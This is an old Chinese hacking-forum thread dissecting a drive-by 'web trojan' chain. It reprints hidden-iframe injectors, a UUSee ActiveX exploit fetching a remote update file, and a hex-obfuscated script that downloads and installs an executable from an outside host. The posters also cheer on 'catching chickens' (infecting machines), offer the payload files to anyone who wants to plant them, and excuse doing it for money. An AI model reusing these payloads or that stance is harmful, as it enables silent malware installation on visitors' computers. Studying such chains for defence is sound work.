0day网马抓补

cshow · 发表于 2008-7-29 16:43:57

贴出来的那段js代码就不分析,能看懂代码知道是干什么的!
我是菜鸟一只,当然不知道是什么东西了,
不分析也罢!
我们来分析那几个马吧!
我已经帮大家下载回来了!
0day.txt应该就是被挂的页子,即上边说的那段js代码当中有一句xiao.htm

Copy code
document.writeln("<IFRaME src=http://www.5lal1a5.cn/xiao.htm width=100 height=0><\/IFRAME>");

我只是猜测,有心以身试马,可是没那么大的魄力!
然后0day.txt当中的代码

Copy code
<script language=javascript src=flash.js></script>
<iframe src=http://www.5lal1a5.cn/www/m5.htm width=0 height=0></iframe>
<iframe src=http://www.5lal1a5.cn/www/uu.htm width=0 height=0></iframe>
<iframe src=http://www.5lal1a5.cn/asp/as.htm width=0 height=0></iframe>

第一个,看名字也知道是flash马了!
至于第二个m5.htm我不知道是什么东西,就不说了!(等会分析~)
第三个uu.htm

Copy code
<html>
<object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target' ></object>
<script language='vbscript'>
arg1="\Program Files\Common Files\uusee\"
arg2="http://www.7o7o7o.cn/www/UUUpgrade.ini"
arg3="http://www.uusee.com/mini3/uusee_client_update/remark.php"
arg4=1
target.Update arg1 ,arg2 ,arg3 ,arg4
</script>
</html>
呵呵,这么明显的告诉我们了,uusee,是个网络电视吧,我不看电视的!
应该就是利用uusee的漏洞,大家想继续了解的可以搜索下关于uusee的内容,如果没有的话!
那就是0day了!
第四个as.htm

Copy code
<SCRIPT LANGUAGE="javascript">window.status="";window.onerror=function(){return true;}
var expires=new Date();
expires.setTime(expires.getTime()+60*60*1000);
var set_cookie=document.cookie.indexOf("cdb=");
if(set_cookie==-1){document.cookie="cdb=1;expires="+expires.toGMTString();
try{var f;
var gw=new ActiveXObject("Downloader.DLoader.1")}catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=0 height=0 src=http:\/\/www.5lal1a5.cn\/asp\/m6.htm><\/iframe>")}else{document.write("<script src=http:\/\/www.5lal1a5.cn\/asp\/article.asp><\/sc"+"ript>")}}}
</Script>

虽然没有全部看懂,但是里边的document.write这句,我们以前挂马的时候好像也用过吧!
那么这应该就是个挂马咯!
看里边的内容就是m6.htm
我也已经下载下来了,打开看看

Copy code
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT><SCRIPT>
var PoHai="\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x78\x64\x6f\x77\x6e\x6c\x2e\x63\x6e\x2f\x6d\x6d\x2e\x65\x78\x65";install["\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x41\x6e\x64\x49\x6e\x73\x74\x61\x6c\x6c"](PoHai);</SCRIPT>

是个16进制加密的!
我们没必要解密了,如果大家想分析他的马的话,可以解密下载下来分析下!
不在本文的探讨范围内,
这里之说这句

Copy code
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT><SCRIPT>&
把这句

Copy code
78ABDC59-D8E7-44D3-9A76-9A0918C52B4A
拿到g.cn里边搜索
一下就明白了,原来是个新浪的某某某某漏洞!
既然能搜索得到,应该也是时间比较长的0day了!
然后分析了下师傅下载下来的那个mu.htm
以同样的方法!
是个access数据库的漏洞!
这下就都明白了!
后来问了下L.S.T的大牛之一Joli
他告诉我,现在网络上挂马的一般都是这几个!
没什么新内容!

抓鸡,得跟着时代步伐走了!
大牛们都这么挂!
咱也不能落后啊!

(本文仅贡学习讨论之用,请勿用于非法用途,否则后果自负)

ヤ椛宠蝶 · 发表于 2008-7-29 16:57:07

以后就不玩了。

cshow · 发表于 2008-7-29 16:43:26

搜索个征途,看到一个SF发布站进去就提示C:\\U.EXE要执行可否执行!
我晕,有网马,还是0day!我全补丁啊!乖乖哟!

拿出malzilla查下代码
www.ssszt.com(除非有非常高心理素质或在网吧不怕中马请随便打开!其他可别打开中马我不管!)

发现其中一处www.ssszt.com/4.js的调用
下回来看代码

发现
document.writeln(\"<script src=\\\"http://www.aonebaby.cn/script.js\\\"><\\/script>\");

下到这个新的URL的script.js
看代码

function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = \"Cookie1=\"
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = \"Cookie1=risb;expires=\"+ Then.toGMTString()
document.writeln(\"<IFRaME src=http://www.5lal1a5.cn/xiao.htm width=100 height=0><\\/IFRAME>\");
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a8008tf=\"51la\";var a8008pu=\"\";var a8008pf=\"51la\";var a8008su=window.location;var a8008sf=document.referrer;var a8008of=\"\";var a8008op=\"\";var a8008ops=1;var a8008ot=1;var a8008d=new Date();var a8008color=\"\";if (navigator.appName==\"Netscape\"){a8008color=screen.pixelDepth;} else {a8008color=screen.colorDepth;}<\\/script><script>a8008tf=top.document.referrer;<\\/script><script>a8008pu =window.parent.location;<\\/script><script>a8008pf=window.parent.document.referrer;<\\/script><script>a8008ops=document.cookie.match(new RegExp(\"(^| )AJSTAT_ok_pages=([^;]*)(;|$)\"));a8008ops=(a8008ops==null)?1: (parseInt(unescape((a8008ops)[2]))+1);var a8008oe =new Date();a8008oe.setTime(a8008oe.getTime()+60*60*1000);document.cookie=\"AJSTAT_ok_pages=\"+a8008ops+ \";path=/;expires=\"+a8008oe.toGMTString();a8008ot=document.cookie.match(new RegExp(\"(^| )AJSTAT_ok_times=([^;]*)(;|$)\"));if(a8008ot==null){a8008ot=1;}else{a8008ot=parseInt(unescape((a8008ot)[2])); a8008ot=(a8008ops==1)?(a8008ot+1):(a8008ot);}a8008oe.setTime(a8008oe.getTime()+365*24*60*60*1000);document.cookie=\"AJSTAT_ok_times=\"+a8008ot+\";path=/;expires=\"+a8008oe.toGMTString();<\\/script><script>a8008of=a8008sf;if(a8008pf!==\"51la\"){a8008of=a8008pf;}if(a8008tf!==\"51la\"){a8008of=a8008tf;}a8008op=a8008pu;try{lainframe}catch(e){a8008op=a8008su;}document.write(\\'<img style=\"width:0px;height:0px\" src=\"http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=19***08&tpages=\\'+a8008ops+\\'&ttimes=\\'+a8008ot+\\'&tzone=\\'+(0-a8008d.getTimezoneOffset()/60)+\\'&tcolor=\\'+a8008color+\\'&sSize=\\'+screen.width+\\',\\'+screen.height+\\'&referrer=\\'+escape(a8008of)+\\'&vpage=\\'+escape(a8008op)+\\'\" \\/>\\');<\\/script>');
}
}Get();

果然是马哦,不过运气好呀,随便找个可疑的就确实是我要找的东西了

再后面的网马文件我一个一个全分析出来了,
打包送大家! 想挂马的挂去,我不鄙视挂马的,但是不反对并不代表我就赞成的! 能不挂尽量不挂,实在穷了挂下也没有什么,大家都是要生活的!

账号		自动登录	找回密码
密码			开放注册